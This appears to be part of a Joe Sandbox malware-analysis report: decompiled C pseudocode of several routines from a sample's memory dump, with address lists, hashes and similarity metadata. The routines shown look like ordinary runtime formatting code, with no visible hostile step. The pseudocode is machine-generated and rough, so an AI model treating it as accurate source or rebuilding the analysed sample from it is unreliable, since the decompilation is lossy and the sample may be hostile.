                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0xe5ac1133;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                                                                                                                                                                                                        				goto 0xe5ac114a;
                                                                                                                                                                                                                                                        				_t127 =  *((intOrPtr*)(_t126 + 0x18));
                                                                                                                                                                                                                                                        				 *((long long*)(__rcx + 0x18)) = _t127 + 8;
                                                                                                                                                                                                                                                        				if (( *(_t126 + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0xe5ac1082;
                                                                                                                                                                                                                                                        				goto 0xe5ac1032;
                                                                                                                                                                                                                                                        				goto 0xe5ac1032;
                                                                                                                                                                                                                                                        				_t128 =  *((intOrPtr*)(_t127 + 0x18));
                                                                                                                                                                                                                                                        				_t106 = dil &  *(_t127 + 0x28) >> 0x00000004;
                                                                                                                                                                                                                                                        				 *((long long*)(__rcx + 0x18)) = _t128 + 8;
                                                                                                                                                                                                                                                        				if (_t106 == 0) goto 0xe5ac10ab;
                                                                                                                                                                                                                                                        				goto 0xe5ac1032;
                                                                                                                                                                                                                                                        				goto 0xe5ac1032;
                                                                                                                                                                                                                                                        				r8d = r8d - 6;
                                                                                                                                                                                                                                                        				if (_t106 == 0) goto 0xe5ac1016;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t106 == 0) goto 0xe5ac1016;
                                                                                                                                                                                                                                                        				r8d = r8d - 2;
                                                                                                                                                                                                                                                        				if (_t106 == 0) goto 0xe5ac1016;
                                                                                                                                                                                                                                                        				goto 0xe5ac1002;
                                                                                                                                                                                                                                                        				_t118 =  *((intOrPtr*)(_t128 + 8));
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				 *((char*)(_t118 + 0x30)) = 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t118 + 0x2c)) = 0x16;
                                                                                                                                                                                                                                                        				_v16 =  *((intOrPtr*)(_t128 + 8));
                                                                                                                                                                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9CE4( *((intOrPtr*)(_t128 + 8)), __rcx, _t128, _t133,  *_t128, __rbp, _t151);
                                                                                                                                                                                                                                                        				goto 0xe5ac11a2;
                                                                                                                                                                                                                                                        				_t129 =  *((intOrPtr*)(_t128 + 0x18));
                                                                                                                                                                                                                                                        				 *((long long*)(_t123 + 0x18)) = _t129 + 8;
                                                                                                                                                                                                                                                        				if (0 == 0) goto 0xe5ac112c;
                                                                                                                                                                                                                                                        				_t144 =  *_t129;
                                                                                                                                                                                                                                                        				goto 0xe5ac1032;
                                                                                                                                                                                                                                                        				goto 0xe5ac1032;
                                                                                                                                                                                                                                                        				 *(_t123 + 0x28) =  *(_t128 + 0x28) & 0xfffffff7;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABFE88(_t123, _t123 + 0x50,  *((intOrPtr*)(_t123 + 0x30)), _t144,  *((intOrPtr*)(_t123 + 8)));
                                                                                                                                                                                                                                                        				if (_t144 != 0) goto 0xe5ac1153;
                                                                                                                                                                                                                                                        				 *(_t123 + 0x28) =  *(_t123 + 0x28) & 0xffffffdf;
                                                                                                                                                                                                                                                        				 *((char*)(_t123 + 0x4c)) = 1;
                                                                                                                                                                                                                                                        				r8b = bpl;
                                                                                                                                                                                                                                                        				if (_t154 != _t154) goto 0xe5ac116c;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC1AFC(_t123, _t123, _t144);
                                                                                                                                                                                                                                                        				goto 0xe5ac1173;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC1770( *_t129, _t123, _t123, _t144, _t153);
                                                                                                                                                                                                                                                        				if (0 == 0) goto 0xe5ac11a0;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t123 + 0x48)) == 0) goto 0xe5ac1191;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x40)))) == 0x30) goto 0xe5ac11a0;
                                                                                                                                                                                                                                                        				 *((long long*)(_t123 + 0x40)) =  *((long long*)(_t123 + 0x40)) + 0xfffffffe;
                                                                                                                                                                                                                                                        				 *((short*)( *((intOrPtr*)(_t123 + 0x40)))) = 0x30;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t123 + 0x48)) =  *((intOrPtr*)(_t123 + 0x48)) + 1;
                                                                                                                                                                                                                                                        				return 1;
                                                                                                                                                                                                                                                        			}






















                                                                                                                                                                                                                                                        0x7ff6e5ac0fb4
                                                                                                                                                                                                                                                        0x7ff6e5ac0fb7
                                                                                                                                                                                                                                                        0x7ff6e5ac0fbb
                                                                                                                                                                                                                                                        0x7ff6e5ac0fbf
                                                                                                                                                                                                                                                        0x7ff6e5ac0fc3
                                                                                                                                                                                                                                                        0x7ff6e5ac0fc7
                                                                                                                                                                                                                                                        0x7ff6e5ac0fcd
                                                                                                                                                                                                                                                        0x7ff6e5ac0fd1
                                                                                                                                                                                                                                                        0x7ff6e5ac0fd4
                                                                                                                                                                                                                                                        0x7ff6e5ac0fd7
                                                                                                                                                                                                                                                        0x7ff6e5ac0fdd
                                                                                                                                                                                                                                                        0x7ff6e5ac0fe1
                                                                                                                                                                                                                                                        0x7ff6e5ac0fe7
                                                                                                                                                                                                                                                        0x7ff6e5ac0fe9
                                                                                                                                                                                                                                                        0x7ff6e5ac0fec
                                                                                                                                                                                                                                                        0x7ff6e5ac0ff2
                                                                                                                                                                                                                                                        0x7ff6e5ac0ff6
                                                                                                                                                                                                                                                        0x7ff6e5ac0ffc
                                                                                                                                                                                                                                                        0x7ff6e5ac1000
                                                                                                                                                                                                                                                        0x7ff6e5ac1002
                                                                                                                                                                                                                                                        0x7ff6e5ac1006
                                                                                                                                                                                                                                                        0x7ff6e5ac1010
                                                                                                                                                                                                                                                        0x7ff6e5ac1016
                                                                                                                                                                                                                                                        0x7ff6e5ac101c
                                                                                                                                                                                                                                                        0x7ff6e5ac102b
                                                                                                                                                                                                                                                        0x7ff6e5ac1039
                                                                                                                                                                                                                                                        0x7ff6e5ac103e
                                                                                                                                                                                                                                                        0x7ff6e5ac1046
                                                                                                                                                                                                                                                        0x7ff6e5ac104d
                                                                                                                                                                                                                                                        0x7ff6e5ac1053
                                                                                                                                                                                                                                                        0x7ff6e5ac105a
                                                                                                                                                                                                                                                        0x7ff6e5ac1067
                                                                                                                                                                                                                                                        0x7ff6e5ac1076
                                                                                                                                                                                                                                                        0x7ff6e5ac107a
                                                                                                                                                                                                                                                        0x7ff6e5ac1080
                                                                                                                                                                                                                                                        0x7ff6e5ac1085
                                                                                                                                                                                                                                                        0x7ff6e5ac108f
                                                                                                                                                                                                                                                        0x7ff6e5ac1098
                                                                                                                                                                                                                                                        0x7ff6e5ac109f
                                                                                                                                                                                                                                                        0x7ff6e5ac10a3
                                                                                                                                                                                                                                                        0x7ff6e5ac10a9
                                                                                                                                                                                                                                                        0x7ff6e5ac10ae
                                                                                                                                                                                                                                                        0x7ff6e5ac10b0
                                                                                                                                                                                                                                                        0x7ff6e5ac10b4
                                                                                                                                                                                                                                                        0x7ff6e5ac10ba
                                                                                                                                                                                                                                                        0x7ff6e5ac10be
                                                                                                                                                                                                                                                        0x7ff6e5ac10c4
                                                                                                                                                                                                                                                        0x7ff6e5ac10c8
                                                                                                                                                                                                                                                        0x7ff6e5ac10ce
                                                                                                                                                                                                                                                        0x7ff6e5ac10d3
                                                                                                                                                                                                                                                        0x7ff6e5ac10d7
                                                                                                                                                                                                                                                        0x7ff6e5ac10da
                                                                                                                                                                                                                                                        0x7ff6e5ac10df
                                                                                                                                                                                                                                                        0x7ff6e5ac10e3
                                                                                                                                                                                                                                                        0x7ff6e5ac10f0
                                                                                                                                                                                                                                                        0x7ff6e5ac10f5
                                                                                                                                                                                                                                                        0x7ff6e5ac10fb
                                                                                                                                                                                                                                                        0x7ff6e5ac1102
                                                                                                                                                                                                                                                        0x7ff6e5ac110f
                                                                                                                                                                                                                                                        0x7ff6e5ac111e
                                                                                                                                                                                                                                                        0x7ff6e5ac1122
                                                                                                                                                                                                                                                        0x7ff6e5ac1124
                                                                                                                                                                                                                                                        0x7ff6e5ac1127
                                                                                                                                                                                                                                                        0x7ff6e5ac112e
                                                                                                                                                                                                                                                        0x7ff6e5ac113e
                                                                                                                                                                                                                                                        0x7ff6e5ac1145
                                                                                                                                                                                                                                                        0x7ff6e5ac114d
                                                                                                                                                                                                                                                        0x7ff6e5ac114f
                                                                                                                                                                                                                                                        0x7ff6e5ac1153
                                                                                                                                                                                                                                                        0x7ff6e5ac1157
                                                                                                                                                                                                                                                        0x7ff6e5ac1160
                                                                                                                                                                                                                                                        0x7ff6e5ac1165
                                                                                                                                                                                                                                                        0x7ff6e5ac116a
                                                                                                                                                                                                                                                        0x7ff6e5ac116e
                                                                                                                                                                                                                                                        0x7ff6e5ac117b
                                                                                                                                                                                                                                                        0x7ff6e5ac1186
                                                                                                                                                                                                                                                        0x7ff6e5ac118f
                                                                                                                                                                                                                                                        0x7ff6e5ac1191
                                                                                                                                                                                                                                                        0x7ff6e5ac119a
                                                                                                                                                                                                                                                        0x7ff6e5ac119d
                                                                                                                                                                                                                                                        0x7ff6e5ac11bc

                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: d861661aa08db629cc23cdca8c369b076586a2e450c00db1ba5d57a294e44a4f
                                                                                                                                                                                                                                                        • Instruction ID: b56a82c89a4f9ed3f28f527152079a4093274285ac0a4d86b4fa3949f6681f5a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d861661aa08db629cc23cdca8c369b076586a2e450c00db1ba5d57a294e44a4f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 26514D37B1869186E7248B2DC06432827A0EF45FA8F244135CA8DDB795CF6BEC43C749
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 72%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC13C4(void* __edx, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                                                                                                                                                                        				long long _v16;
                                                                                                                                                                                                                                                        				signed long long _v24;
                                                                                                                                                                                                                                                        				signed int _t83;
                                                                                                                                                                                                                                                        				void* _t98;
                                                                                                                                                                                                                                                        				intOrPtr _t99;
                                                                                                                                                                                                                                                        				signed int _t106;
                                                                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                                                                        				intOrPtr _t118;
                                                                                                                                                                                                                                                        				void* _t123;
                                                                                                                                                                                                                                                        				intOrPtr* _t126;
                                                                                                                                                                                                                                                        				intOrPtr _t127;
                                                                                                                                                                                                                                                        				char* _t128;
                                                                                                                                                                                                                                                        				intOrPtr* _t129;
                                                                                                                                                                                                                                                        				void* _t133;
                                                                                                                                                                                                                                                        				intOrPtr _t144;
                                                                                                                                                                                                                                                        				void* _t148;
                                                                                                                                                                                                                                                        				void* _t151;
                                                                                                                                                                                                                                                        				void* _t153;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t114 = _t148;
                                                                                                                                                                                                                                                        				 *((long long*)(_t114 + 8)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t114 + 0x10)) = __rbp;
                                                                                                                                                                                                                                                        				 *((long long*)(_t114 + 0x18)) = __rsi;
                                                                                                                                                                                                                                                        				 *((long long*)(_t114 + 0x20)) = __rdi;
                                                                                                                                                                                                                                                        				_push(_t153);
                                                                                                                                                                                                                                                        				r8d =  *((intOrPtr*)(__rcx + 0x34));
                                                                                                                                                                                                                                                        				bpl = __edx;
                                                                                                                                                                                                                                                        				_t123 = __rcx;
                                                                                                                                                                                                                                                        				r14d = 8;
                                                                                                                                                                                                                                                        				_t98 = r8d - 5;
                                                                                                                                                                                                                                                        				if (_t98 > 0) goto 0xe5ac14c0;
                                                                                                                                                                                                                                                        				if (_t98 == 0) goto 0xe5ac1426;
                                                                                                                                                                                                                                                        				_t99 = r8d;
                                                                                                                                                                                                                                                        				if (_t99 == 0) goto 0xe5ac1517;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t99 == 0) goto 0xe5ac1497;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t99 == 0) goto 0xe5ac146f;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t99 == 0) goto 0xe5ac1517;
                                                                                                                                                                                                                                                        				if (r8d != 1) goto 0xe5ac14e3;
                                                                                                                                                                                                                                                        				_t83 =  *(__rcx + 0x28);
                                                                                                                                                                                                                                                        				_t126 =  *((intOrPtr*)(__rcx + 0x18));
                                                                                                                                                                                                                                                        				 *((long long*)(__rcx + 0x18)) = _t126 + 8;
                                                                                                                                                                                                                                                        				if ((_t83 >> 0x00000004 & 0x00000001) == 0) goto 0xe5ac1459;
                                                                                                                                                                                                                                                        				if ( *_t126 >= 0) goto 0xe5ac1459;
                                                                                                                                                                                                                                                        				 *(__rcx + 0x28) = _t83 | 0x00000040;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(__rcx + 0x30)) >= 0) goto 0xe5ac1543;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(__rcx + 0x30)) = 1;
                                                                                                                                                                                                                                                        				goto 0xe5ac155a;
                                                                                                                                                                                                                                                        				_t127 =  *((intOrPtr*)(_t126 + 0x18));
                                                                                                                                                                                                                                                        				 *((long long*)(__rcx + 0x18)) = _t127 + 8;
                                                                                                                                                                                                                                                        				if (( *(_t126 + 0x28) >> 0x00000004 & 0x00000001) == 0) goto 0xe5ac1492;
                                                                                                                                                                                                                                                        				goto 0xe5ac1442;
                                                                                                                                                                                                                                                        				goto 0xe5ac1442;
                                                                                                                                                                                                                                                        				_t128 =  *((intOrPtr*)(_t127 + 0x18));
                                                                                                                                                                                                                                                        				_t106 = dil &  *(_t127 + 0x28) >> 0x00000004;
                                                                                                                                                                                                                                                        				 *((long long*)(__rcx + 0x18)) = _t128 + 8;
                                                                                                                                                                                                                                                        				if (_t106 == 0) goto 0xe5ac14bb;
                                                                                                                                                                                                                                                        				goto 0xe5ac1442;
                                                                                                                                                                                                                                                        				goto 0xe5ac1442;
                                                                                                                                                                                                                                                        				r8d = r8d - 6;
                                                                                                                                                                                                                                                        				if (_t106 == 0) goto 0xe5ac1426;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t106 == 0) goto 0xe5ac1426;
                                                                                                                                                                                                                                                        				r8d = r8d - 2;
                                                                                                                                                                                                                                                        				if (_t106 == 0) goto 0xe5ac1426;
                                                                                                                                                                                                                                                        				goto 0xe5ac1412;
                                                                                                                                                                                                                                                        				_t118 =  *((intOrPtr*)(_t128 + 8));
                                                                                                                                                                                                                                                        				r9d = 0;
                                                                                                                                                                                                                                                        				r8d = 0;
                                                                                                                                                                                                                                                        				 *((char*)(_t118 + 0x30)) = 1;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t118 + 0x2c)) = 0x16;
                                                                                                                                                                                                                                                        				_v16 =  *((intOrPtr*)(_t128 + 8));
                                                                                                                                                                                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC9CE4( *((intOrPtr*)(_t128 + 8)), __rcx, _t128, _t133,  *_t128, __rbp, _t151);
                                                                                                                                                                                                                                                        				goto 0xe5ac15b2;
                                                                                                                                                                                                                                                        				_t129 =  *((intOrPtr*)(_t128 + 0x18));
                                                                                                                                                                                                                                                        				 *((long long*)(_t123 + 0x18)) = _t129 + 8;
                                                                                                                                                                                                                                                        				if (0 == 0) goto 0xe5ac153c;
                                                                                                                                                                                                                                                        				_t144 =  *_t129;
                                                                                                                                                                                                                                                        				goto 0xe5ac1442;
                                                                                                                                                                                                                                                        				goto 0xe5ac1442;
                                                                                                                                                                                                                                                        				 *(_t123 + 0x28) =  *(_t128 + 0x28) & 0xfffffff7;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5ABFE88(_t123, _t123 + 0x50,  *((intOrPtr*)(_t123 + 0x30)), _t144,  *((intOrPtr*)(_t123 + 8)));
                                                                                                                                                                                                                                                        				if (_t144 != 0) goto 0xe5ac1563;
                                                                                                                                                                                                                                                        				 *(_t123 + 0x28) =  *(_t123 + 0x28) & 0xffffffdf;
                                                                                                                                                                                                                                                        				 *((char*)(_t123 + 0x4c)) = 1;
                                                                                                                                                                                                                                                        				r8b = bpl;
                                                                                                                                                                                                                                                        				if (_t153 != _t153) goto 0xe5ac157c;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC1C44( *(_t128 + 0x28) & 0xfffffff7, _t123, _t144,  *((intOrPtr*)(_t123 + 8)));
                                                                                                                                                                                                                                                        				goto 0xe5ac1583;
                                                                                                                                                                                                                                                        				E00007FF67FF6E5AC18B4( *_t129, _t123,  *((intOrPtr*)(_t123 + 8)));
                                                                                                                                                                                                                                                        				if (0 == 0) goto 0xe5ac15b0;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)(_t123 + 0x48)) == 0) goto 0xe5ac15a1;
                                                                                                                                                                                                                                                        				if ( *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x40)))) == 0x30) goto 0xe5ac15b0;
                                                                                                                                                                                                                                                        				 *((long long*)(_t123 + 0x40)) =  *((long long*)(_t123 + 0x40)) + 0xfffffffe;
                                                                                                                                                                                                                                                        				 *((short*)( *((intOrPtr*)(_t123 + 0x40)))) = 0x30;
                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t123 + 0x48)) =  *((intOrPtr*)(_t123 + 0x48)) + 1;
                                                                                                                                                                                                                                                        				return 1;
                                                                                                                                                                                                                                                        			}





















                                                                                                                                                                                                                                                        0x7ff6e5ac13c4
                                                                                                                                                                                                                                                        0x7ff6e5ac13c7
                                                                                                                                                                                                                                                        0x7ff6e5ac13cb
                                                                                                                                                                                                                                                        0x7ff6e5ac13cf
                                                                                                                                                                                                                                                        0x7ff6e5ac13d3
                                                                                                                                                                                                                                                        0x7ff6e5ac13d7
                                                                                                                                                                                                                                                        0x7ff6e5ac13dd
                                                                                                                                                                                                                                                        0x7ff6e5ac13e1
                                                                                                                                                                                                                                                        0x7ff6e5ac13e4
                                                                                                                                                                                                                                                        0x7ff6e5ac13e7
                                                                                                                                                                                                                                                        0x7ff6e5ac13ed
                                                                                                                                                                                                                                                        0x7ff6e5ac13f1
                                                                                                                                                                                                                                                        0x7ff6e5ac13f7
                                                                                                                                                                                                                                                        0x7ff6e5ac13f9
                                                                                                                                                                                                                                                        0x7ff6e5ac13fc
                                                                                                                                                                                                                                                        0x7ff6e5ac1402
                                                                                                                                                                                                                                                        0x7ff6e5ac1406
                                                                                                                                                                                                                                                        0x7ff6e5ac140c
                                                                                                                                                                                                                                                        0x7ff6e5ac1410
                                                                                                                                                                                                                                                        0x7ff6e5ac1412
                                                                                                                                                                                                                                                        0x7ff6e5ac1416
                                                                                                                                                                                                                                                        0x7ff6e5ac1420
                                                                                                                                                                                                                                                        0x7ff6e5ac1426
                                                                                                                                                                                                                                                        0x7ff6e5ac142c
                                                                                                                                                                                                                                                        0x7ff6e5ac143b
                                                                                                                                                                                                                                                        0x7ff6e5ac1449
                                                                                                                                                                                                                                                        0x7ff6e5ac144e
                                                                                                                                                                                                                                                        0x7ff6e5ac1456
                                                                                                                                                                                                                                                        0x7ff6e5ac145d
                                                                                                                                                                                                                                                        0x7ff6e5ac1463
                                                                                                                                                                                                                                                        0x7ff6e5ac146a
                                                                                                                                                                                                                                                        0x7ff6e5ac1477
                                                                                                                                                                                                                                                        0x7ff6e5ac1486
                                                                                                                                                                                                                                                        0x7ff6e5ac148a
                                                                                                                                                                                                                                                        0x7ff6e5ac1490
                                                                                                                                                                                                                                                        0x7ff6e5ac1495
                                                                                                                                                                                                                                                        0x7ff6e5ac149f
                                                                                                                                                                                                                                                        0x7ff6e5ac14a8
                                                                                                                                                                                                                                                        0x7ff6e5ac14af
                                                                                                                                                                                                                                                        0x7ff6e5ac14b3
                                                                                                                                                                                                                                                        0x7ff6e5ac14b9
                                                                                                                                                                                                                                                        0x7ff6e5ac14be
                                                                                                                                                                                                                                                        0x7ff6e5ac14c0
                                                                                                                                                                                                                                                        0x7ff6e5ac14c4
                                                                                                                                                                                                                                                        0x7ff6e5ac14ca
                                                                                                                                                                                                                                                        0x7ff6e5ac14ce
                                                                                                                                                                                                                                                        0x7ff6e5ac14d4
                                                                                                                                                                                                                                                        0x7ff6e5ac14d8
                                                                                                                                                                                                                                                        0x7ff6e5ac14de
                                                                                                                                                                                                                                                        0x7ff6e5ac14e3
                                                                                                                                                                                                                                                        0x7ff6e5ac14e7
                                                                                                                                                                                                                                                        0x7ff6e5ac14ea
                                                                                                                                                                                                                                                        0x7ff6e5ac14ef
                                                                                                                                                                                                                                                        0x7ff6e5ac14f3
                                                                                                                                                                                                                                                        0x7ff6e5ac1500
                                                                                                                                                                                                                                                        0x7ff6e5ac1505
                                                                                                                                                                                                                                                        0x7ff6e5ac150b
                                                                                                                                                                                                                                                        0x7ff6e5ac1512
                                                                                                                                                                                                                                                        0x7ff6e5ac151f
                                                                                                                                                                                                                                                        0x7ff6e5ac152e
                                                                                                                                                                                                                                                        0x7ff6e5ac1532
                                                                                                                                                                                                                                                        0x7ff6e5ac1534
                                                                                                                                                                                                                                                        0x7ff6e5ac1537
                                                                                                                                                                                                                                                        0x7ff6e5ac153e
                                                                                                                                                                                                                                                        0x7ff6e5ac154e
                                                                                                                                                                                                                                                        0x7ff6e5ac1555
                                                                                                                                                                                                                                                        0x7ff6e5ac155d
                                                                                                                                                                                                                                                        0x7ff6e5ac155f
                                                                                                                                                                                                                                                        0x7ff6e5ac1563
                                                                                                                                                                                                                                                        0x7ff6e5ac1567
                                                                                                                                                                                                                                                        0x7ff6e5ac1570
                                                                                                                                                                                                                                                        0x7ff6e5ac1575
                                                                                                                                                                                                                                                        0x7ff6e5ac157a
                                                                                                                                                                                                                                                        0x7ff6e5ac157e
                                                                                                                                                                                                                                                        0x7ff6e5ac158b
                                                                                                                                                                                                                                                        0x7ff6e5ac1596
                                                                                                                                                                                                                                                        0x7ff6e5ac159f
                                                                                                                                                                                                                                                        0x7ff6e5ac15a1
                                                                                                                                                                                                                                                        0x7ff6e5ac15aa
                                                                                                                                                                                                                                                        0x7ff6e5ac15ad
                                                                                                                                                                                                                                                        0x7ff6e5ac15cc

                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.376513692.00007FF6E5AB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6E5AB0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376485844.00007FF6E5AB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376830179.00007FF6E5ADA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AED000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.376996075.00007FF6E5AFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5AFE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B16000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.377034687.00007FF6E5B43000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff6e5ab0000_322pVOVprx.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                        • Opcode ID: 867914ff4df0b6b44d704adc42bbe88cde9096fdc707783f05752eff833c7ffe
                                                                                                                                                                                                                                                        • Instruction ID: a8309708d89c9214ed9ba98c74eeaadfedd128363303b1431be8bdf6a1cc1a08
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 867914ff4df0b6b44d704adc42bbe88cde9096fdc707783f05752eff833c7ffe
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA514C77B18A5586E7248B2DD16072827A0EF45F68F244131CA4EDB795CF3BEC42C789
                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                        C-Code - Quality: 73%
                                                                                                                                                                                                                                                        			E00007FF67FF6E5AC0BA4(void* __edx, long long __rbx, void* __rcx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
                                                                                                                                                                                                                                                        				long long _v16;
                                                                                                                                                                                                                                                        				signed long long _v24;
                                                                                                                                                                                                                                                        				signed int _t83;
                                                                                                                                                                                                                                                        				void* _t98;
                                                                                                                                                                                                                                                        				intOrPtr _t99;
                                                                                                                                                                                                                                                        				signed int _t106;
                                                                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                                                                        				intOrPtr _t118;
                                                                                                                                                                                                                                                        				void* _t123;
                                                                                                                                                                                                                                                        				intOrPtr* _t126;
                                                                                                                                                                                                                                                        				intOrPtr _t127;
                                                                                                                                                                                                                                                        				char* _t128;
                                                                                                                                                                                                                                                        				intOrPtr* _t129;
                                                                                                                                                                                                                                                        				void* _t133;
                                                                                                                                                                                                                                                        				intOrPtr _t144;
                                                                                                                                                                                                                                                        				void* _t148;
                                                                                                                                                                                                                                                        				void* _t151;
                                                                                                                                                                                                                                                        				void* _t153;
                                                                                                                                                                                                                                                        				void* _t154;
                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                        				_t114 = _t148;
                                                                                                                                                                                                                                                        				 *((long long*)(_t114 + 8)) = __rbx;
                                                                                                                                                                                                                                                        				 *((long long*)(_t114 + 0x10)) = __rbp;
                                                                                                                                                                                                                                                        				 *((long long*)(_t114 + 0x18)) = __rsi;
                                                                                                                                                                                                                                                        				 *((long long*)(_t114 + 0x20)) = __rdi;
                                                                                                                                                                                                                                                        				_push(_t154);
                                                                                                                                                                                                                                                        				r8d =  *((intOrPtr*)(__rcx + 0x34));
                                                                                                                                                                                                                                                        				bpl = __edx;
                                                                                                                                                                                                                                                        				_t123 = __rcx;
                                                                                                                                                                                                                                                        				r14d = 8;
                                                                                                                                                                                                                                                        				_t98 = r8d - 5;
                                                                                                                                                                                                                                                        				if (_t98 > 0) goto 0xe5ac0ca0;
                                                                                                                                                                                                                                                        				if (_t98 == 0) goto 0xe5ac0c06;
                                                                                                                                                                                                                                                        				_t99 = r8d;
                                                                                                                                                                                                                                                        				if (_t99 == 0) goto 0xe5ac0cf7;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t99 == 0) goto 0xe5ac0c77;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t99 == 0) goto 0xe5ac0c4f;
                                                                                                                                                                                                                                                        				r8d = r8d - 1;
                                                                                                                                                                                                                                                        				if (_t99 == 0) goto 0xe5ac0cf7;
                                                                                                                                                                                                                                                        				if (r8d != 1) goto 0xe5ac0cc3;
                                                                                                                                                                                                                                                        				_t83 =  *(__rcx + 0x28);
                                                                                                                                                                                                                                                        				_t126 =  *((intOrPtr*)(__rcx + 0x18));
                                                                                                                                                                                                                                                        				 *((long long*)(__rcx + 0x18)) = _t126 + 8;
                                                                                                                                                                                                                                                        				if ((_t83 >> 0x00000004 & 0x00000001) == 0) goto 0xe5ac0c39;
